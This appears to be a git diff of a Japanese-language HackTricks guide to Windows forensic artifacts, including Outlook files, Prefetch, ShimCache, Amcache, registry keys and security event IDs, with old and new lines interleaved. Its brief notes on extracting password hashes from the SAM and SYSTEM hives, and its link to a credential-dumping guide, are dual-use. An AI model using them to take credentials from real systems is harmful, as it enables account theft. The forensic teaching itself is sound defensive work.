- `%USERPROFILE%\Local Settings\Application Data\Microsoft\Outlook`WinXP
- `%USERPROFILE%\AppData\Local\Microsoft\Outlook`
レジストリパス`HKEY_CURRENT_USER\Software\Microsoft\WindowsNT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook`は、使用されているファイルを示します。
レジストリパス`HKEY_CURRENT_USER\Software\Microsoft\WindowsNT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook`は、使用されているファイルを示しています。
PSTファイルは、ツール[**Kernel PST Viewer**](https://www.nucleustechnologies.com/es/visor-de-pst.html)を使用して開くことができます。
PSTファイルは、[**Kernel PST Viewer**](https://www.nucleustechnologies.com/es/visor-de-pst.html)ツールを使用して開くことができます。
![](<../../../images/image (498).png>)
### Microsoft Outlook OSTファイル
**OSTファイル**は、Microsoft Outlookが**IMAP**または**Exchange**サーバーで構成されているときに生成され、PSTファイルと同様の情報を保存します。このファイルはサーバーと同期され、**過去12か月間**のデータを保持し、**最大サイズは50GB**で、PSTファイルと同じディレクトリにあります。OSTファイルを表示するには、[**Kernel OST viewer**](https://www.nucleustechnologies.com/ost-viewer.html)を利用できます。
**OSTファイル**は、Microsoft Outlookが**IMAP**または**Exchange**サーバーで構成されると生成され、PSTファイルと同様の情報を保存します。このファイルはサーバーと同期され、**過去12か月間**のデータを保持し、**最大サイズは50GB**で、PSTファイルと同じディレクトリにあります。OSTファイルを表示するには、[**Kernel OST viewer**](https://www.nucleustechnologies.com/ost-viewer.html)を利用できます。
### 添付ファイルの取得
失われた添付ファイルは、以下から回復可能かもしれません
失われた添付ファイルは、以下から回復可能です
- **IE10**の場合:`%APPDATA%\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook`
- **IE11以降**の場合:`%APPDATA%\Local\Microsoft\InetCache\Content.Outlook`
@ -227,8 +225,8 @@ PSTファイルは、ツール[**Kernel PST Viewer**](https://www.nucleustechnol
### 画像サムネイル
- **Windows XPおよび8-8.1**:サムネイルを含むフォルダーにアクセスすると、削除後も画像プレビューを保存する`thumbs.db`ファイルが生成されます。
- **Windows 7/10**UNCパスを介してネットワーク上でアクセスると`thumbs.db`が作成されます。
- **Windows Vista以降**:サムネイルプレビューは`%userprofile%\AppData\Local\Microsoft\Windows\Explorer`に集中管理され、**thumbcache_xxx.db**という名前のファイルが作成されます。[**Thumbsviewer**](https://thumbsviewer.github.io)および[**ThumbCache Viewer**](https://thumbcacheviewer.github.io)は、これらのファイルを表示するためのツールです。
- **Windows 7/10**UNCパスを介してネットワーク上でアクセスされると`thumbs.db`が作成されます。
- **Windows Vista以降**:サムネイルプレビューは`%userprofile%\AppData\Local\Microsoft\Windows\Explorer`に集中、**thumbcache_xxx.db**という名前のファイルが作成されます。[**Thumbsviewer**](https://thumbsviewer.github.io)および[**ThumbCache Viewer**](https://thumbcacheviewer.github.io)は、これらのファイルを表示するためのツールです。
### Windowsレジストリ情報
@ -236,7 +234,7 @@ Windowsレジストリは、広範なシステムおよびユーザー活動デ
- `%windir%\System32\Config`は、さまざまな`HKEY_LOCAL_MACHINE`サブキー用です。
- `%UserProfile%{User}\NTUSER.DAT`は、`HKEY_CURRENT_USER`用です。
- Windows Vista以降のバージョンは、`HKEY_LOCAL_MACHINE`レジストリファイル`%Windir%\System32\Config\RegBack\`にバックアップされます。
- Windows Vista以降のバージョンは、`HKEY_LOCAL_MACHINE`レジストリファイル`%Windir%\System32\Config\RegBack\`にバックアップします。
- さらに、プログラム実行情報は、Windows VistaおよびWindows 2008 Server以降の`%UserProfile%\{User}\AppData\Local\Microsoft\Windows\USERCLASS.DAT`に保存されます。
### ツール
@ -245,7 +243,7 @@ Windowsレジストリは、広範なシステムおよびユーザー活動デ
- **レジストリエディタ**Windowsにインストールされています。現在のセッションのWindowsレジストリをナビゲートするためのGUIです。
- [**Registry Explorer**](https://ericzimmerman.github.io/#!index.md)レジストリファイルをロードし、GUIでナビゲートすることができます。また、興味深い情報を持つキーをハイライトするブックマークも含まれています。
- [**RegRipper**](https://github.com/keydet89/RegRipper3.0):再び、ロードされたレジストリをナビゲートできるGUIを持ち、ロードされたレジストリ内の興味深い情報をハイライトするプラグインも含まれています。
- [**RegRipper**](https://github.com/keydet89/RegRipper3.0):再び、ロードされたレジストリをナビゲートするためのGUIがあり、ロードされたレジストリ内の興味深い情報をハイライトするプラグインも含まれています。
- [**Windows Registry Recovery**](https://www.mitec.cz/wrr.html)レジストリから重要な情報を抽出できる別のGUIアプリケーションです。
### 削除された要素の回復
@ -254,13 +252,13 @@ Windowsレジストリは、広範なシステムおよびユーザー活動デ
### 最終書き込み時間
各キー-値には、**最後に修正された時間**を示す**タイムスタンプ**が含まれています。
各キー-値には、最後に変更された時間を示す**タイムスタンプ**が含まれています。
### SAM
ファイル/ハイブ**SAM**には、システムの**ユーザー、グループ、およびユーザーパスワード**のハッシュが含まれています。
`SAM\Domains\Account\Users`で、ユーザー名、RID、最終ログイン、最終失敗ログオン、ログインカウンター、パスワードポリシー、およびアカウントが作成された時を取得できます。**ハッシュ**を取得するには、ファイル/ハイブ**SYSTEM**も**必要**です。
`SAM\Domains\Account\Users`で、ユーザー名、RID、最終ログイン、最終失敗ログオン、ログインカウンター、パスワードポリシー、およびアカウントが作成された時を取得できます。**ハッシュ**を取得するには、ファイル/ハイブ**SYSTEM**も**必要**です。
### Windowsレジストリの興味深いエントリ
@ -284,15 +282,15 @@ interesting-windows-registry-keys.md
### Windowsプリフェッチ
プリフェッチは、コンピュータがユーザーが**近い将来にアクセスする可能性のあるコンテンツを表示するために必要なリソースを静かに**取得することを可能にする技術です。これにより、リソースに迅速にアクセスできるようになります。
プリフェッチは、コンピュータがユーザーが**近い将来にアクセスする可能性のあるコンテンツを表示するために必要なリソースを静かに取得する**ことを可能にする技術です。これにより、リソースに迅速にアクセスできます。
Windowsプリフェッチは、**実行されたプログラムのキャッシュを作成**して、より迅速にロードできるようにします。これらのキャッシュは、パス`C:\Windows\Prefetch`内に`.pf`ファイルとして作成されます。XP/VISTA/WIN7では128ファイル、Win8/Win10では1024ファイルの制限があります。
Windowsプリフェッチは、**実行されたプログラムのキャッシュを作成**して、より速くロードできるようにします。これらのキャッシュは、`C:\Windows\Prefetch`内に`.pf`ファイルとして作成されます。XP/VISTA/WIN7では128ファイル、Win8/Win10では1024ファイルの制限があります。
ファイル名は`{program_name}-{hash}.pf`として作成されますハッシュは実行可能ファイルのパスと引数に基づいています。W10では、これらのファイルは圧縮されています。ファイルの存在は、**プログラムが実行された**ことを示しています。
ファイル`C:\Windows\Prefetch\Layout.ini`には、**プリフェッチされたファイルのフォルダーの名前**が含まれています。このファイルには、**実行回数**、**実行日**、および**プログラムによって**開かれた**ファイルに関する情報が含まれています。
ファイル`C:\Windows\Prefetch\Layout.ini`には、**プリフェッチされたファイルのフォルダーの名前**が含まれています。このファイルには、**実行回数**、**実行日**、および**プログラムによって開かれたファイル**に関する情報が含まれています。
これらのファイルを検査するには、ツール[**PEcmd.exe**](https://github.com/EricZimmerman/PECmd)を使用できます。
これらのファイルを調査するには、[**PEcmd.exe**](https://github.com/EricZimmerman/PECmd)ツールを使用できます。
```bash
.\PECmd.exe -d C:\Users\student\Desktop\Prefetch --html "C:\Users\student\Desktop\out_folder"
```
@ -300,7 +298,7 @@ Windowsプリフェッチは、**実行されたプログラムのキャッシ
### Superprefetch
**Superprefetch**は、次に読み込まれるものを予測することによって**プログラムをより速く読み込む**という同じ目的を持っています。しかし、これはprefetchサービスの代わりにはなりません。\
**Superprefetch**は、次に読み込まれるものを予測することによって**プログラムをより速く読み込む**という同じ目的を持っています。しかし、これはプリフェッチサービスの代わりにはなりません。\
このサービスは、`C:\Windows\Prefetch\Ag*.db`にデータベースファイルを生成します。
これらのデータベースには、**プログラム**の**名前**、**実行回数**、**開かれたファイル**、**アクセスされたボリューム**、**完全なパス**、**時間枠**、および**タイムスタンプ**が含まれています。
@ -315,8 +313,8 @@ Windowsプリフェッチは、**実行されたプログラムのキャッシ
- AppIDとパス
- プロセスを実行したユーザー
- 送信バイト
- 受信バイト
- 送信バイト
- 受信バイト
- ネットワークインターフェース
- 接続の持続時間
- プロセスの持続時間
@ -329,18 +327,18 @@ Windowsプリフェッチは、**実行されたプログラムのキャッシ
```
### AppCompatCache (ShimCache)
**AppCompatCache**、別名 **ShimCache** は、**Microsoft** によって開発された **Application Compatibility Database** の一部であり、アプリケーションの互換性の問題に対処します。このシステムコンポーネントは、さまざまなファイルメタデータを記録します。これには以下が含まれます:
**AppCompatCache**、別名 **ShimCache** は、**Microsoft** によって開発された **Application Compatibility Database** の一部であり、アプリケーションの互換性の問題に対処するためのものです。このシステムコンポーネントは、以下のファイルメタデータのさまざまな情報を記録します。
- ファイルのフルパス
- ファイルのサイズ
- **$Standard_Information** (SI) の最終変更時間
- ShimCache の最終更新時
- **$Standard_Information** (SI) の最終更新時刻
- ShimCache の最終更新時
- プロセス実行フラグ
このデータは、オペレーティングシステムのバージョンに基づいて特定の場所にレジストリ内に保存されます
このデータは、オペレーティングシステムのバージョンに基づいて特定の場所にレジストリ内に保存されます
- XPの場合、データは `SYSTEM\CurrentControlSet\Control\SessionManager\Appcompatibility\AppcompatCache` に保存され、96エントリの容量があります。
- Server 2003 および Windows バージョン 2008、2012、2016、7、8、10 の場合、ストレージパスは `SYSTEM\CurrentControlSet\Control\SessionManager\AppcompatCache\AppCompatCache` であり、それぞれ512および1024エントリを収容します。
- XP の場合、データは `SYSTEM\CurrentControlSet\Control\SessionManager\Appcompatibility\AppcompatCache` に保存され、96 エントリの容量があります。
- Server 2003 および Windows バージョン 2008、2012、2016、7、8、10 の場合、ストレージパスは `SYSTEM\CurrentControlSet\Control\SessionManager\AppcompatCache\AppCompatCache` であり、それぞれ 512 および 1024 エントリを収容します。
保存された情報を解析するには、[**AppCompatCacheParser** tool](https://github.com/EricZimmerman/AppCompatCacheParser) の使用が推奨されます。
@ -350,41 +348,41 @@ Windowsプリフェッチは、**実行されたプログラムのキャッシ
**Amcache.hve** ファイルは、システム上で実行されたアプリケーションの詳細を記録するレジストリハイブです。通常、`C:\Windows\AppCompat\Programas\Amcache.hve` にあります。
このファイルは、最近実行されたプロセスの記録を保存することで注目されており、実行可能ファイルへのパスやその SHA1 ハッシュが含まれています。この情報は、システム上のアプリケーションの活動を追跡するために非常に貴重です。
このファイルは、実行されたプロセスの記録を保存することで注目されており、実行可能ファイルへのパスやその SHA1 ハッシュを含んでいます。この情報は、システム上のアプリケーションの活動を追跡するために非常に貴重です。
**Amcache.hve** からデータを抽出して分析するには、[**AmcacheParser**](https://github.com/EricZimmerman/AmcacheParser) ツールを使用できます。以下のコマンドは、AmcacheParser を使用して **Amcache.hve** ファイルの内容を解析し、結果を CSV 形式で出力する方法の例です
**Amcache.hve** からデータを抽出して分析するには、[**AmcacheParser**](https://github.com/EricZimmerman/AmcacheParser) ツールを使用できます。以下のコマンドは、AmcacheParser を使用して **Amcache.hve** ファイルの内容を解析し、結果を CSV 形式で出力する方法の例です
```bash
AmcacheParser.exe -f C:\Users\genericUser\Desktop\Amcache.hve --csv C:\Users\genericUser\Desktop\outputFolder
```
生成されたCSVファイルの中で、`Amcache_Unassociated file entries`は、関連付けのないファイルエントリに関する豊富な情報を提供するため、特に注目に値します。
生成されたCSVファイルの中で、`Amcache_Unassociated file entries`は、関連ファイルエントリに関する豊富な情報を提供するため、特に注目に値します。
最も興味深いCVSファイルは、`Amcache_Unassociated file entries`です。
### RecentFileCache
このアーティファクトはW7の`C:\Windows\AppCompat\Programs\RecentFileCache.bcf`にのみ存在し、いくつかのバイナリの最近の実行に関する情報を含んでいます。
このアーティファクトはW7の`C:\Windows\AppCompat\Programs\RecentFileCache.bcf`にのみ存在し、いくつかのバイナリの最近の実行に関する情報を含んでいます。
ファイルを解析するには、ツール[**RecentFileCacheParse**](https://github.com/EricZimmerman/RecentFileCacheParser)を使用できます。
### スケジュールされたタスク
これらは`C:\Windows\Tasks`または`C:\Windows\System32\Tasks`から抽出でき、XMLとして読み取ることができます。
これらは`C:\Windows\Tasks`または`C:\Windows\System32\Tasks`から抽出でき、XMLとして読ことができます。
### サービス
これらはレジストリの`SYSTEM\ControlSet001\Services`あります。何が実行されるか、いつ実行されるかを見ることができます。
これらはレジストリの`SYSTEM\ControlSet001\Services`見つけることができます。何が実行されるか、いつ実行されるかを見ることができます。
### **Windows Store**
インストールされたアプリケーションは`\ProgramData\Microsoft\Windows\AppRepository\`にあります。このリポジトリには、データベース**`StateRepository-Machine.srd`**内に**システム内の各アプリケーションの**ログがあります。
インストールされたアプリケーションは`\ProgramData\Microsoft\Windows\AppRepository\`にあります。このリポジトリには、データベース**`StateRepository-Machine.srd`**内にシステムにインストールされた**各アプリケーション**の**ログ**があります。
このデータベースのアプリケーションテーブル内には、「Application ID」、「PackageNumber」、「Display Name」という列があり、これらの列にはプレインストールされたアプリケーションとインストールされたアプリケーションに関する情報が含まれています。また、インストールされたアプリケーションのIDは連続している必要があるため、いくつかのアプリケーションがアンインストールされたかどうかを確認できます。
このデータベースのアプリケーションテーブル内には、「Application ID」、「PackageNumber」、「Display Name」という列があり、これらの列にはプレインストールされたアプリケーションとインストールされたアプリケーションに関する情報が含まれており、インストールされたアプリケーションのIDは連続しているため、いくつかのアプリケーションがアンインストールされたかどうかを確認できます。
インストールされたアプリケーションは、レジストリパス`Software\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\Applications\`内でも見つけることができます。また、アンインストールされたアプリケーションは`Software\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\Deleted\`にあります。
インストールされたアプリケーションは、レジストリパス`Software\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\Applications\`内でも見つけることができます。また、アンインストールされたアプリケーションは`Software\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\Deleted\`にあります。
## Windowsイベント
Windowsイベントに表示される情報は次のとおりです
Windowsイベントに表示される情報は次のとおりです:
- 何が起こったか
- タイムスタンプUTC + 0
@ -392,70 +390,70 @@ Windowsイベントに表示される情報は次のとおりです
- 関与したホストホスト名、IP
- アクセスされた資産(ファイル、フォルダー、プリンター、サービス)
ログは、Windows Vista以前は`C:\Windows\System32\config`にあり、Windows Vista以降は`C:\Windows\System32\winevt\Logs`にあります。Windows Vista以前はイベントログはバイナリ形式であり、以降は**XML形式**で、**.evtx**拡張子を使用しています。
ログは、Windows Vista以前`C:\Windows\System32\config`にあり、Windows Vista以降`C:\Windows\System32\winevt\Logs`にあります。Windows Vista以前はイベントログはバイナリ形式であり、以降は**XML形式**で、**.evtx**拡張子を使用しています。
イベントファイルの場所は、SYSTEMレジストリの**`HKLM\SYSTEM\CurrentControlSet\services\EventLog\{Application|System|Security}`**で見つけることができます。
これらはWindowsイベントビューア**`eventvwr.msc`**)または[**Event Log Explorer**](https://eventlogxp.com) **または** [**Evtx Explorer/EvtxECmd**](https://ericzimmerman.github.io/#!index.md)**を使用して視覚化できます。
これらはWindowsイベントビューア**`eventvwr.msc`**)または[**Event Log Explorer**](https://eventlogxp.com) **** [**Evtx Explorer/EvtxECmd**](https://ericzimmerman.github.io/#!index.md)**を使用して視覚化できます。**
## Windowsセキュリティイベントログの理解
アクセスイベントは、`C:\Windows\System32\winevt\Security.evtx`にあるセキュリティ構成ファイルに記録されます。このファイルのサイズは調整可能で、容量に達すると古いイベントが上書きされます。記録されたイベントには、ユーザーログインとログオフ、ユーザーアクション、セキュリティ設定の変更、ファイル、フォルダー、および共有資産へのアクセスが含まれます。
アクセスイベントは、`C:\Windows\System32\winevt\Security.evtx`にあるセキュリティ構成ファイルに記録されます。このファイルのサイズは調整可能で、容量に達すると古いイベントが上書きされます。記録されたイベントには、ユーザーログインとログオフ、ユーザーアクション、セキュリティ設定の変更、ファイル、フォルダー、共有資産へのアクセスが含まれます。
### ユーザー認証のための主要なイベントID
- **EventID 4624**ユーザーが正常に認証されたことを示します。
- **EventID 4625**認証の失敗を示します。
- **EventIDs 4634/4647**ユーザーログオフイベントを表します。
- **EventID 4672**管理者権限でのログインを示します。
- **EventID 4624**: ユーザーが正常に認証されたことを示します。
- **EventID 4625**: 認証の失敗を示します。
- **EventIDs 4634/4647**: ユーザーログオフイベントを表します。
- **EventID 4672**: 管理者権限でのログインを示します。
#### EventID 4634/4647内のサブタイプ
- **インタラクティブ (2)**:直接ユーザーログイン。
- **ネットワーク (3)**共有フォルダーへのアクセス。
- **バッチ (4)**バッチプロセスの実行。
- **サービス (5)**サービスの起動。
- **プロキシ (6)**プロキシ認証。
- **ロック解除 (7)**パスワードで画面がロック解除されました。
- **ネットワーククリアテキスト (8)**クリアテキストパスワードの送信、通常はIISから
- **新しい資格情報 (9)**アクセスのために異なる資格情報を使用。
- **リモートインタラクティブ (10)**リモートデスクトップまたはターミナルサービスのログイン。
- **キャッシュインタラクティブ (11)**ドメインコントローラーに連絡せずにキャッシュされた資格情報でログイン。
- **キャッシュリモートインタラクティブ (12)**キャッシュされた資格情報でのリモートログイン。
- **キャッシュロック解除 (13)**キャッシュされた資格情報でのロック解除。
- **インタラクティブ (2)**: 直接のユーザーログイン。
- **ネットワーク (3)**: 共有フォルダーへのアクセス。
- **バッチ (4)**: バッチプロセスの実行。
- **サービス (5)**: サービスの起動。
- **プロキシ (6)**: プロキシ認証。
- **ロック解除 (7)**: パスワードで画面がロック解除されました。
- **ネットワーククリアテキスト (8)**: IISからのクリアテキストパスワードの送信
- **新しい資格情報 (9)**: アクセスのために異なる資格情報を使用。
- **リモートインタラクティブ (10)**: リモートデスクトップまたはターミナルサービスのログイン。
- **キャッシュインタラクティブ (11)**: ドメインコントローラーに連絡せずにキャッシュされた資格情報でログイン。
- **キャッシュリモートインタラクティブ (12)**: キャッシュされた資格情報でのリモートログイン。
- **キャッシュロック解除 (13)**: キャッシュされた資格情報でのロック解除。
#### EventID 4625のステータスおよびサブステータスコード
- **0xC0000064**ユーザー名が存在しない - ユーザー名列挙攻撃を示す可能性があります。
- **0xC000006A**正しいユーザー名だがパスワードが間違っている - パスワード推測またはブルートフォース攻撃の可能性。
- **0xC0000234**:ユーザーアカウントがロックアウトされました - 複数の失敗したログインの結果としてブルートフォース攻撃が続く可能性があります
- **0xC0000072**アカウントが無効 - 無効なアカウントへの不正アクセスの試み。
- **0xC000006F**許可された時間外のログオン - 設定されたログイン時間外のアクセスの試みを示し、不正アクセスの可能性があります。
- **0xC0000070**ワークステーション制限の違反 - 不正な場所からのログインの試みの可能性があります
- **0xC0000193**アカウントの有効期限切れ - 有効期限切れのユーザーアカウントへのアクセスの試み。
- **0xC0000071**パスワードの有効期限切れ - 古いパスワードでのログインの試み。
- **0xC0000133**時間同期の問題 - クライアントとサーバー間の大きな時間の不一致は、パス・ザ・チケットのようなより高度な攻撃を示す可能性があります。
- **0xC0000224**:必須のパスワード変更が必要 - 頻繁な必須変更は、アカウントセキュリティを不安定にしようとする試みを示唆するかもしれません。
- **0xC0000225**セキュリティの問題ではなく、システムバグを示します。
- **0xC000015b**拒否されたログオンタイプ - サービスログオンを実行しようとするユーザーなど、不正なログオンタイプでのアクセスの試み。
- **0xC0000064**: ユーザー名が存在しない - ユーザー名列挙攻撃を示す可能性があります。
- **0xC000006A**: 正しいユーザー名だがパスワードが間違っている - パスワード推測またはブルートフォース攻撃の可能性。
- **0xC0000234**: ユーザーアカウントがロックアウトされている - 複数の失敗したログインに続くブルートフォース攻撃の可能性
- **0xC0000072**: アカウントが無効 - 無効なアカウントへの不正アクセスの試み。
- **0xC000006F**: 許可された時間外のログオン - 設定されたログイン時間外のアクセスの試みを示し、不正アクセスの可能性があります。
- **0xC0000070**: ワークステーション制限の違反 - 不正な場所からのログインの試みの可能性。
- **0xC0000193**: アカウントの有効期限切れ - 有効期限切れのユーザーアカウントへのアクセスの試み。
- **0xC0000071**: パスワードの有効期限切れ - 古いパスワードでのログインの試み。
- **0xC0000133**: 時間同期の問題 - クライアントとサーバー間の大きな時間の不一致は、パス・ザ・チケットのようなより高度な攻撃を示す可能性があります。
- **0xC0000224**: 強制的なパスワード変更が必要 - 頻繁な強制変更は、アカウントセキュリティを不安定にしようとする試みを示唆するかもしれません。
- **0xC0000225**: セキュリティの問題ではなく、システムバグを示します。
- **0xC000015b**: 拒否されたログオンタイプ - サービスログオンを実行しようとするユーザーなど、不正なログオンタイプでのアクセスの試み。
#### EventID 4616
- **時間変更**システム時間の変更、イベントのタイムラインを隠す可能性があります。
- **時間変更**: システム時間の変更、イベントのタイムラインを隠す可能性があります。
#### EventID 6005および6006
- **システムの起動とシャットダウン**EventID 6005はシステムの起動を示し、EventID 6006はシャットダウンを示します。
- **システムの起動とシャットダウン**: EventID 6005はシステムの起動を示し、EventID 6006はシャットダウンを示します。
#### EventID 1102
- **ログ削除**セキュリティログがクリアされることは、違法行為を隠蔽するための赤信号です。
- **ログ削除**: セキュリティログがクリアされることは、違法行為を隠蔽するための赤信号です。
#### USBデバイストラッキングのためのイベントID
- **20001 / 20003 / 10000**USBデバイスの最初の接続。
- **10100**USBドライバーの更新。
- **EventID 112**USBデバイス挿入の時間。
- **20001 / 20003 / 10000**: USBデバイスの最初の接続。
- **10100**: USBドライバーの更新。
- **EventID 112**: USBデバイス挿入の時間。
これらのログインタイプや資格情報ダンプの機会をシミュレートする実用的な例については、[Altered Securityの詳細ガイド](https://www.alteredsecurity.com/post/fantastic-windows-logon-types-and-where-to-find-credentials-in-them)を参照してください。
@ -475,11 +473,11 @@ Windowsイベントに表示される情報は次のとおりです
#### 時間変更
EventID 4616によって記録され、システム時間の変更はフォレンジック分析を複雑にする可能性があります。
EventID 4616によって記録され、システム時間の変更は法医学的分析を複雑にする可能性があります。
#### USBデバイストラッキング
USBデバイストラッキングに役立つシステムイベントIDには、初回使用のための20001/20003/10000、ドライバー更新のための10100、挿入タイムスタンプのためのEventID 112が含まれます。
USBデバイストラッキングに役立つシステムイベントIDには、初回使用のための20001/20003/10000、ドライバー更新のための10100、挿入タイムスタンプのためのDeviceSetupManagerからのEventID 112が含まれます。
#### システム電源イベント
@ -487,6 +485,6 @@ EventID 6005はシステムの起動を示し、EventID 6006はシャットダ
#### ログ削除
セキュリティEventID 1102はログの削除を示し、フォレンジック分析にとって重要なイベントです。
セキュリティEventID 1102はログの削除を示し、法医学的分析にとって重要なイベントです。
{{#include ../../../banners/hacktricks-training.md}}

54
src/generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md
View File

@ -1,29 +1,27 @@
# 興味深いWindowsレジストリキー
### 興味深いWindowsレジストリキー
{{#include ../../../banners/hacktricks-training.md}}
### **Windowsバージョンと所有者情報**
### **Windowsバージョンと所有者情報**
- **`Software\Microsoft\Windows NT\CurrentVersion`**に位置し、Windowsのバージョン、サービスパック、インストール時間、登録された所有者の名前が簡潔に表示されます。
- **`Software\Microsoft\Windows NT\CurrentVersion`** に位置し、Windowsのバージョン、サービスパック、インストール時間、登録された所有者の名前が簡潔に表示されます。
### **コンピュータ名**
- ホスト名は**`System\ControlSet001\Control\ComputerName\ComputerName`**の下にあります。
- ホスト名は **`System\ControlSet001\Control\ComputerName\ComputerName`** にあります。
### **タイムゾーン設定**
- システムのタイムゾーンは**`System\ControlSet001\Control\TimeZoneInformation`**に保存されています。
- システムのタイムゾーンは **`System\ControlSet001\Control\TimeZoneInformation`** に保存されています。
### **アクセス時間の追跡**
- デフォルトでは、最終アクセス時間の追跡はオフになっています**`NtfsDisableLastAccessUpdate=1`**)。これを有効にするには、次のコマンドを使用します:
- デフォルトでは、最終アクセス時間の追跡はオフになっています (**`NtfsDisableLastAccessUpdate=1`**)。これを有効にするには、次のコマンドを使用します:
`fsutil behavior set disablelastaccess 0`
### Windowsバージョンとサービスパック
### Windowsバージョンとサービスパック
- **Windowsバージョン**はエディションHome、ProとそのリリースWindows 10、Windows 11を示し、**サービスパック**は修正や時には新機能を含む更新です。
- **Windowsバージョン** はエディションHome、ProとそのリリースWindows 10、Windows 11を示し、**サービスパック** は修正や時には新機能を含む更新です。
### 最終アクセス時間の有効化
@ -31,70 +29,70 @@
### ネットワーク情報の詳細
- レジストリには、**ネットワークの種類(ワイヤレス、ケーブル、3G**や**ネットワークカテゴリ(パブリック、プライベート/ホーム、ドメイン/ワーク)**を含む、ネットワーク構成に関する広範なデータが保持されており、ネットワークセキュリティ設定や権限を理解するために重要です。
- レジストリには、**ネットワークの種類(無線、ケーブル、3G** や **ネットワークカテゴリ(パブリック、プライベート/ホーム、ドメイン/ワーク)** を含む、ネットワーク構成に関する詳細なデータが保存されており、ネットワークセキュリティ設定や権限を理解するために重要です。
### クライアントサイドキャッシングCSC
- **CSC**は共有ファイルのコピーをキャッシュすることでオフラインファイルアクセスを向上させます。異なる**CSCFlags**設定は、どのファイルがどのようにキャッシュされるかを制御し、特に接続が不安定な環境でのパフォーマンスやユーザー体験に影響を与えます。
- **CSC** は共有ファイルのコピーをキャッシュすることでオフラインファイルアクセスを向上させます。異なる **CSCFlags** 設定は、どのファイルがどのようにキャッシュされるかを制御し、特に接続が不安定な環境でのパフォーマンスやユーザー体験に影響を与えます。
### 自動起動プログラム
- 様々な`Run`および`RunOnce`レジストリキーにリストされているプログラムは、起動時に自動的に起動され、システムのブート時間に影響を与え、マルウェアや不要なソフトウェアを特定するための興味のあるポイントとなる可能性があります。
- 様々な `Run` および `RunOnce` レジストリキーにリストされているプログラムは、起動時に自動的に起動され、システムのブート時間に影響を与え、マルウェアや不要なソフトウェアを特定するための興味深いポイントとなる可能性があります。
### シェルバッグ
- **シェルバッグ**はフォルダビューの設定を保存するだけでなく、フォルダが存在しなくてもフォルダアクセスの法医学的証拠を提供します。これは、他の手段では明らかでないユーザー活動を明らかにするため、調査にとって非常に貴重です。
- **シェルバッグ** はフォルダビューの設定を保存するだけでなく、フォルダが存在しなくてもフォルダアクセスの法医学的証拠を提供します。これは、他の手段では明らかでないユーザー活動を明らかにするため、調査にとって非常に貴重です。
### USB情報と法医学
- レジストリに保存されたUSBデバイスに関する詳細は、どのデバイスがコンピュータに接続されていたかを追跡するのに役立ち、デバイスを機密ファイル転送や不正アクセスのインシデントに関連付ける可能性があります。
- レジストリに保存されたUSBデバイスに関する詳細は、どのデバイスがコンピュータに接続されていたかを追跡するのに役立ち、機密ファイル転送や不正アクセスのインシデントにデバイスを関連付ける可能性があります。
### ボリュームシリアル番号
- **ボリュームシリアル番号**は、ファイルシステムの特定のインスタンスを追跡するのに重要であり、異なるデバイス間でファイルの起源を確立する必要がある法医学的シナリオで役立ちます。
- **ボリュームシリアル番号** は、ファイルシステムの特定のインスタンスを追跡するのに重要であり、異なるデバイス間でファイルの起源を確立する必要がある法医学的シナリオで役立ちます。
### **シャットダウンの詳細**
- シャットダウン時間とカウント後者はXPのみ、**`System\ControlSet001\Control\Windows`**および**`System\ControlSet001\Control\Watchdog\Display`**に保持されています。
- シャットダウン時間とカウント後者はXPのみ **`System\ControlSet001\Control\Windows`** および **`System\ControlSet001\Control\Watchdog\Display`** に保存されています。
### **ネットワーク構成**
- 詳細なネットワークインターフェース情報については、**`System\ControlSet001\Services\Tcpip\Parameters\Interfaces{GUID_INTERFACE}`**を参照してください。
- 最初と最後のネットワーク接続時間VPN接続を含むは、**`Software\Microsoft\Windows NT\CurrentVersion\NetworkList`**のさまざまなパスに記録されています。
- 詳細なネットワークインターフェース情報については、**`System\ControlSet001\Services\Tcpip\Parameters\Interfaces{GUID_INTERFACE}`** を参照してください。
- VPN接続を含む最初と最後のネットワーク接続時間は、**`Software\Microsoft\Windows NT\CurrentVersion\NetworkList`** のさまざまなパスに記録されています。
### **共有フォルダ**
- 共有フォルダと設定は**`System\ControlSet001\Services\lanmanserver\Shares`**の下にあります。クライアントサイドキャッシングCSC設定はオフラインファイルの可用性を決定します。
- 共有フォルダと設定は **`System\ControlSet001\Services\lanmanserver\Shares`** にあります。クライアントサイドキャッシングCSC設定はオフラインファイルの可用性を決定します。
### **自動的に起動するプログラム**
- **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Run`**のようなパスや、`Software\Microsoft\Windows\CurrentVersion`の下の類似のエントリは、起動時に実行されるプログラムの詳細を示します。
- **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Run`** のようなパスや、`Software\Microsoft\Windows\CurrentVersion` の下の類似のエントリは、起動時に実行されるプログラムを詳細に示しています。
### **検索と入力されたパス**
- エクスプローラーの検索と入力されたパスは、**`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer`**の下でWordwheelQueryおよびTypedPathsとして追跡されます。
- エクスプローラーの検索と入力されたパスは、**`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer`** の下でWordwheelQueryおよびTypedPathsとして追跡されています。
### **最近の文書とOfficeファイル**
- 最近アクセスされた文書とOfficeファイルは、`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs`および特定のOfficeバージョンのパスに記録されています。
- 最近アクセスされた文書とOfficeファイルは、`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs` および特定のOfficeバージョンのパスに記録されています。
### **最も最近使用されたMRUアイテム**
- 最近のファイルパスやコマンドを示すMRUリストは、`NTUSER.DAT`のさまざまな`ComDlg32`および`Explorer`サブキーに保存されています。
- 最近のファイルパスやコマンドを示すMRUリストは、`NTUSER.DAT` のさまざまな `ComDlg32` および `Explorer` サブキーに保存されています。
### **ユーザー活動の追跡**
- ユーザーアシスト機能は、実行回数や最終実行時間を含む詳細なアプリケーション使用統計を**`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{GUID}\Count`**に記録します。
